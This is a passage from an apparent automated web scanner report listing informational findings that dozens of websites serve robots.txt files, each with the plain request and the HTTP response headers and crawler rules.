Host:   http://www.mylovedpee.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylovedpee.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:10:25 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 10 Nov 2009 13:38:01 GMT
ETag: "19b80a5-50-4af96cb9"
Accept-Ranges: bytes
Content-Length: 80

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.mylovedpee.com/sitemap.xml

30.314. http://www.mylovedspy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedspy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylovedspy.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:51:49 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Sat, 14 Nov 2009 09:49:56 GMT
ETag: "20005f-50-4afe7d44"
Accept-Ranges: bytes
Content-Length: 80

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.mylovedspy.com/sitemap.xml

30.315. http://www.mynews.in/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mynews.in
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mynews.in

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:58:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.5
Last-Modified: Tue, 28 Sep 2010 07:38:35 GMT
ETag: "2de491c-14d-4914ceeb194c0"
Accept-Ranges: bytes
Content-Length: 333
Connection: close
Content-Type: text/plain

User-agent: Googlebot-news
Disallow: /Blog/
Disallow: /aggregator/
Disallow: /goodies/
Disallow: /blog.php
Disallow: /blog_details.php

User-agent: *
Disallow: /cms/
Disallow: /search/
Disallow: /sear
...[SNIP]...

30.316. http://www.mypearsonstore.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mypearsonstore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mypearsonstore.com

Response

HTTP/1.1 200 OK
Content-Length: 364
Content-Type: text/plain
Last-Modified: Fri, 07 Jan 2011 16:03:11 GMT
Accept-Ranges: bytes
ETag: "0792e6284aecb1:fb8d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:16:33 GMT
Connection: close

# $Header: /WWW/Commonality/robots.txt 2 3/05/04 7:59a Mhanger $

User-agent: *

Disallow: /affiliates
Disallow: /articles/printerfriendly.asp*
Disallow: /authorfirst
Disallow: /cart
Disa
...[SNIP]...

30.317. http://www.myregistry.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myregistry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myregistry.com

Response

HTTP/1.1 200 OK
Content-Length: 492
Content-Type: text/plain
Last-Modified: Mon, 13 Apr 2009 20:20:00 GMT
Accept-Ranges: bytes
ETag: "a261da3875bcc91:4a71"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:28:52 GMT
Connection: close

User-agent: Googlebot-Image

User-agent: *
Disallow: /FacebookCompare/
Disallow: /a/
Disallow: /Members/
Disallow: /absolutenl/
Disallow: /Agents/
Disallow: /App_Browsers/
Disallow: /App_Glob
...[SNIP]...

30.318. http://www.myrtlebeach-resorts.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myrtlebeach-resorts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myrtlebeach-resorts.com

Response

HTTP/1.1 200 OK
Content-Length: 313
Content-Type: text/plain
Content-Location: http://www.myrtlebeach-resorts.com/robots.txt
Last-Modified: Tue, 29 Mar 2011 17:14:21 GMT
Accept-Ranges: bytes
ETag: "c11979be34eecb1:12e4e6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:48:47 GMT
Connection: close

User-agent: *
Sitemap: http://www.myrtlebeach-resorts.com/sitemap.xml
Disallow: http://www.myrtlebeach-resorts.com/3resorts.html
Dsiallow: http://www.myrtlebeach-resorts.com/coralbeach@gotomyrtle.c
...[SNIP]...

30.319. http://www.mytattoogallery.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mytattoogallery.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mytattoogallery.com

Response

HTTP/1.1 200 OK
Content-Length: 126
Content-Type: text/plain
Last-Modified: Mon, 19 Oct 2009 22:41:58 GMT
Accept-Ranges: bytes
ETag: "0bf955dd51ca1:316"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:46:29 GMT
Connection: close

User-agent: *
Disallow: /images/spacer.gif
Disallow: /ct.html
Disallow: /sd/
Disallow: /st.aspx
Disallow: /ct/ct.aspx


30.320. http://www.mytelus.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mytelus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mytelus.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 07:06:52 GMT
Server: Netscape-Enterprise/3.6 SP3
Content-type: text/plain
Etag: "414c05-4b-3f256498"
Last-modified: Mon, 28 Jul 2003 17:59:52 GMT
Content-length: 75
Accept-ranges: bytes
Connection: close
Set-Cookie: BIGipServermt-fe-proxies=1590405312.20480.0000; expires=Mon, 02-May-2011 04:50:54 GMT; path=/

User-agent: *
Disallow: /internet/consolidatedbilling
Disallow: /local-cgi

30.321. http://www.nartube.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nartube.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nartube.net

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:38:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 14:37:32 GMT
Accept-Ranges: bytes
Content-Length: 217
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt to block all bots except bots from Google , MSN , Yahoo
User-agent: Googlebot
Disallow:
User-agent: Slurp
Disallow:
User-agent: MSNBot
Disallow:
User-agent: ia_archiver
Disallow:
User-age
...[SNIP]...

30.322. http://www.ncgenweb.us/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ncgenweb.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ncgenweb.us

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:41:15 GMT
Server: Apache
Last-Modified: Thu, 04 Mar 2010 00:44:07 GMT
Accept-Ranges: bytes
Content-Length: 182
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: FreeFind
allow:

User-agent: Googlebot
allow:

User-agent: msnbot
allow:

User-agent: PicoSearch/1.0
allow:

User-agent: *
allow: /

User-agent: *
Disallow: /dogsnc/tp

30.323. http://www.ndsmcobserver.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndsmcobserver.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ndsmcobserver.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:37 GMT
Server: Apache
Last-Modified: Wed, 05 Jan 2011 21:48:00 GMT
ETag: W/"26-1294264080000"
Content-Length: 26
Age: 1787
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

30.324. http://www.newenglandmoves.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.newenglandmoves.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:08:18 GMT
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Sat, 01 May 2010 07:02:46 GMT
ETag: "a6710-14e-48582f2731743"
Accept-Ranges: bytes
Content-Length: 334
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

30.325. http://www.nflgridirongab.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nflgridirongab.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nflgridirongab.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:45:10 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-jkmkfeml=064D93A647533D784AE6B3A9154391FC; path=/
Last-Modified: Sat, 05 Mar 2011 13:25:18 GMT
Content-Length: 289

Sitemap: http://www.nflgridirongab.com/sitemap.xml

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/
Disallow: /author/
Di
...[SNIP]...

30.326. http://www.nhregister.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nhregister.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nhregister.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Sun, 01 May 2011 23:30:16 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=5000
Accept-Ranges: bytes
Last-Modified: Tue, 22 Feb 2011 20:22:43 GMT
Real-Hostname: nhregister.com
Content-Length: 1366
Connection: close
X-Cache-Info: cached

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebo
...[SNIP]...

30.327. http://www.nikonrumors.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nikonrumors.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nikonrumors.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:44:39 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Mon, 09 Feb 2009 02:18:11 GMT
Accept-Ranges: bytes
Content-Length: 820
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 10
Disallow: /cgi-bin
Disallow: /license.txt/
Disallow: /readme.html
Disallow: /wp-admin.php
Disallow: /wp-atom.php
Disallow: /wp-commentsrss2.php
Disallow: /wp-feed.php
Dis
...[SNIP]...

30.328. http://www.ntb.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ntb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ntb.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 03 Sep 2010 20:02:18 GMT
Accept-Ranges: bytes
ETag: "013ce9a24bcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:48:26 GMT
Connection: close
Content-Length: 254

User-agent: *
Allow: /Tire*
Allow: /Wheels
Allow: /Services
Allow: /Locations
Allow: /Promotions
Allow: /Site Map
Disallow: /app_offline.htm
Disallow: /App_offline.htm
Disallow: /*?ID=My-Chec
...[SNIP]...

30.329. http://www.numerologist.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.numerologist.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.numerologist.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:10:17 GMT
Server: Apache
Last-Modified: Wed, 01 Dec 2010 22:21:15 GMT
Accept-Ranges: bytes
Content-Length: 34
Vary: Accept-Encoding
Cache-Control: max-age=604800
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /cgi-bin/

30.330. http://www.nursing-jobs.us/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nursing-jobs.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nursing-jobs.us

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:23 GMT
Server: Apache
Last-Modified: Sat, 30 Jan 2010 04:21:12 GMT
Accept-Ranges: bytes
Content-Length: 79
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /apply/
Disallow: /templates/
Disallow: /templates_c/

30.331. http://www.onlinemoneystash.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinemoneystash.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlinemoneystash.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:13 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "210629f-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

30.332. http://www.onlinetextmessage.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinetextmessage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlinetextmessage.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:08 GMT
Server: Apache
Last-Modified: Wed, 20 Jun 2007 03:22:59 GMT
ETag: "aa81ee-17-4334df2644ac0"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

30.333. http://www.onlocationvacations.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlocationvacations.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.onlocationvacations.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
Content-Type: text/plain; charset=UTF-8
Date: Mon, 02 May 2011 00:52:42 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-jhoibjei=5B4A6E8D19E41287044378FB3CA99E82; path=/
Last-Modified: Tue, 17 Nov 2009 23:55:14 GMT
Content-Length: 23

User-agent: *
Disallow:

30.334. http://www.organicgardening.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.organicgardening.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.organicgardening.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.5
Last-Modified: Mon, 25 Apr 2011 15:32:08 GMT
ETag: "66860-624-4a1bfe912ee00"
Accept-Ranges: bytes
Content-Length: 1572
Content-Type: text/plain
Cache-Control: max-age=604800
Expires: Mon, 09 May 2011 00:45:22 GMT
Date: Mon, 02 May 2011 00:45:22 GMT
Connection: close

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.335. http://www.orlandojobs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandojobs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orlandojobs.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 00:52:56 GMT
Content-Length: 165
Content-Type: text/plain
Last-Modified: Sun, 29 Apr 2007 22:33:10 GMT
Accept-Ranges: bytes
ETag: "461a955dae8ac71:784"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

User-agent: *
Disallow: /e_report_job_stats_email.asp
Disallow: /search/daily_GOJsearchagent_act.asp
Disallow: /site_jobsearch.asp
Disallow: /c_searchresults.asp

30.336. http://www.oshkosh365.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oshkosh365.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oshkosh365.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 16 Jun 2009 14:02:15 GMT
Accept-Ranges: bytes
ETag: "e1417ad8beec91:1198"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: close
Date: Mon, 02 May 2011 00:01:15 GMT
Age: 68974
Content-Length: 74

User-agent: *
Disallow: /WebResource.axd*
Disallow: /ScriptResource.axd*

30.337. http://www.oshkoshbgosh.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oshkoshbgosh.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oshkoshbgosh.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:37 GMT
Server: Apache
Content-Length: 158
Cache-Control: public;max-age=76425
Expires: Mon, 02 May 2011 21:58:22 GMT
Last-Modified: Sun, 01 May 2011 21:58:22 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: text/plain

Sitemap: http://www.carters.com/sitemap1_default.xml
User-agent: *
Disallow: /*/Wishlist-Show
Disallow: /*/Account-Show?id=carters
Disallow: /*/Cart-Show

30.338. http://www.ourmidland.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ourmidland.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ourmidland.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2080228
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 02 May 2011 00:14:48 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0316
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: ourmidland.com
X-TNCMS-Served-By: cmsapp7
Content-Length: 796

User-agent: Slurp
Disallow: /content/tncms/ads/
Disallow: /content/tncms/live/

User-agent: Googlebot
Disallow: /content/tncms/ads/
Disallow: /content/tncms/live/

User-agent: Mediapartners-Go
...[SNIP]...

30.339. http://www.ourprayer.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ourprayer.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ourprayer.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 15 Apr 2011 05:09:53 GMT
Accept-Ranges: bytes
ETag: "e381fc5a2bfbcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:44 GMT
Connection: close
Content-Length: 61
Set-Cookie: cookie1=4090937773.1.3717150784.2424965831; path=/

User-agent: *
Disallow: /stage/
Disallow: /qppage404.aspx

30.340. http://www.outdoor-babes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outdoor-babes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.outdoor-babes.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.34
Date: Sun, 01 May 2011 23:29:21 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 06 Jan 2009 18:18:26 GMT
ETag: "30b816e-27-45fd46ef38080"
Accept-Ranges: bytes
Content-Length: 39

User-agent: *
Disallow:
Allow: *


30.341. http://www.outdoorjp.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outdoorjp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.outdoorjp.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:56:02 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 12:39:18 GMT
ETag: "26c4e8e-19-4cb6f9f6"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

30.342. http://www.oxfamamerica.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oxfamamerica.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.oxfamamerica.org

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 02 May 2011 00:53:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-Cache-Headers-Set-By: CachingPolicyManager: /oxfam/caching_policy_manager
Expires: Thu, 03 May 2001 23:35:38 GMT
Last-Modified: Mon, 16 Nov 2009 11:22:15 GMT
X-Caching-Rule-Id: downloads
Cache-Control: max-age=0, s-maxage=86400, must-revalidate, proxy-revalidate
X-Header-Set-Id: cache-in-proxy-24-hours
Content-Length: 766
X-Varnish: 2109309786 2109297003
Age: 4651
Via: 1.1 varnish

# Define access-restrictions for robots/spiders
# http://www.robotstxt.org/wc/norobots.html


# By default we allow robots to access all areas of our site
# already accessible to anonymous users

Use
...[SNIP]...

30.343. http://www.pal-item.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pal-item.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pal-item.com

Response

HTTP/1.0 200 OK
Content-Length: 797
Content-Type: text/plain
Last-Modified: Mon, 01 Nov 2010 15:21:32 GMT
Accept-Ranges: bytes
ETag: "0a69b76d879cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Date: Mon, 02 May 2011 00:14:39 GMT
Connection: close

# Robots.txt
# Be nice.
#
User-agent: MSIECrawler
Disallow: /
#
User-agent: *
Disallow: /apps/pbcs.dll/classifieds
Disallow: /apps/pbcs.dll/events
Disallow: /apps/pbcs.dll/index
Disallow: /a
...[SNIP]...

30.344. http://www.pashnit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pashnit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pashnit.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:24:25 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 08 Dec 2007 11:24:33 GMT
Accept-Ranges: bytes
Content-Length: 158
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

User-agent: Slurp
Crawl-delay: 60

30.345. http://www.patdollard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.patdollard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.patdollard.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:56 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 11 Oct 2009 06:11:13 GMT
ETag: "3da0d7e-28-ae1b0240"
Accept-Ranges: bytes
Content-Length: 40
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
crawl-delay: 60

30.346. http://www.pdga.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pdga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pdga.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:14:01 GMT
Server: Apache
Last-Modified: Mon, 21 Feb 2011 16:51:48 GMT
ETag: "c-6c8-49ccdadfb5100"
Accept-Ranges: bytes
Content-Length: 1736
Cache-Control: max-age=1209600
Expires: Sun, 15 May 2011 23:14:01 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt 792 2008-12-11 07:28:45Z elmuerte $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.347. http://www.pearljam.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pearljam.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pearljam.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 02 May 2011 00:19:32 GMT
Content-Type: text/plain
Content-Length: 1572
Last-Modified: Tue, 15 Mar 2011 06:17:20 GMT
Connection: close
Accept-Ranges: bytes

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.348. http://www.pearsoncmg.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pearsoncmg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pearsoncmg.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:53 GMT
Last-Modified: Wed, 17 Oct 2007 13:32:03 GMT
ETag: "4ecc8-68-47160ed3"
Accept-Ranges: bytes
Content-Length: 104
Content-Type: text/plain
Connection: close


User-agent: gsa-crawler
Disallow:

User-agent: WPS_Site_Robot
Disallow:

User-agent: *
Disallow: /



30.349. http://www.petri.co.il/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petri.co.il
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.petri.co.il

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 00:25:08 GMT
Content-Type: text/plain
Content-Length: 5602
Last-Modified: Mon, 23 Mar 2009 20:47:34 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: BotRightHere
Disallow: /


User-agent: larbin
Disallow: /

User-agent: b2w/0.1
Disallow: /

User-agent: Copernic
Disallow: /

User-agent: psbot
Disallow: /

User-agent: Python-urllib
Disal
...[SNIP]...

30.350. http://www.pfaw.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pfaw.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pfaw.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:09:38 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 19 Feb 2010 14:40:21 GMT
ETag: "270a7e-636-47ff5101e9f40"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Sun, 15 May 2011 23:09:38 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.351. http://www.philabundance.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.philabundance.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.philabundance.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:53 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Wed, 11 Aug 2010 18:30:39 GMT
ETag: "8f25b-330-48d90724871c0"
Accept-Ranges: bytes
Content-Length: 816
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

#****************************************************************************
# robots.txt
# : Robots, spiders, and search engines use this file to detmine which
# content they should *not*
...[SNIP]...

30.352. http://www.pinkemo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pinkemo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pinkemo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
